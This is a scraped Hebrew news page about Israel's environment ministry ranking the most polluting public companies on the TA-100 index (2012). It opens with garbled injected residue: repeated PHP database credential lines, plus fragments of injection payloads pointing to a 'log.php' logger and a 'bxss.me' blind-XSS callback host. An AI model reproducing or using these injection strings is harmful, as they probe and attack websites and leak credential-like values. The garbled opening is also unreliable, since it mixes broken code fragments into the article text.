$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> המשרד להגנת הסביבה חשף את רמת הזיהום הסביבתי של חברות בישראל
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

דירוג החברות הציבוריות המזהמות ביותר את הסביבה בישראל

תאריך: 28/02/2012 15:41   מחבר: מערכת האתר

בוועידה הלאומית הראשונה לצמיחה ירוקה בחסות העיתון "כלכליסט" והמשרד להגנת הסביבה, חשף המשרד את רמת הזיהום הסביבתי של חברות התעשייה הציבוריות הנסחרות במדד תל אביב 100.

שיטת הדירוג

לפני כחצי שנה פנה המשרד להגנת הסביבה לחברות והודיע על החלטתו לבצע את הדירוג הנ"ל. לחברות הוצגה שיטת הדירוג. המידע נאסף על ידי גורמים במשרד, נחקר והוערך בסיוע חברת "גרין איי" המתמחה בהערכת חברות עבור משקיעים בארץ ובחו"ל.

הדירוג טיפל ב 27 חברות ציבוריות ועוד 160 חברות בת ומפעלים הנמצאים ברשותן.  הדירוג נועד במהותו לבדוק עמידה בתנאי הרגולציה והדיווחים הכספיים בכל הקשור לניהול הסביבתי המתחייב.

הדירוג נועד גם לספק כלי למשקיעים באותן חברות נבדקות מתוך הנחת עבודה מוכרת וידועה, שסיכונים סביבתיים עלולים לגרום לסיכונים פיננסיים. חברה שאינה מצייתת לתקנים הסביבתיים עלולה להיתבע ולשלם קנסות כבדים דבר שישפיע על כדאיות ההשקעה בחברות.

הדירוג

סדר הדירוג להלן נקבע כך שמי שבמקום הראשון הוא המזהם הגדול ביותר וכן הלאה בסדר יורד:

גרנית הכרמל

כיל

החברה לישראל (שמחזיקה בחברות: כיל, בזן, טאוור וצים)

קבוצת עזריאלי

בזן

טבע ופרוטארום

קבוצת כלל עם החברות: תעבורה, נייר חדרה, יפאורה, קרגל ומנועי בית שמש.

קבוצת דיסקונט השקעות שכוללת את : מכתשים אגן, מקסימה, המלט,

קבוצת שטראוס, אלביט מערכות, אוסם

החברות המצטיינות בדירוג

אבגול

טאואר -ג'אז

פלסאון

פריגו

פרוטליקס

אורמת

גיוון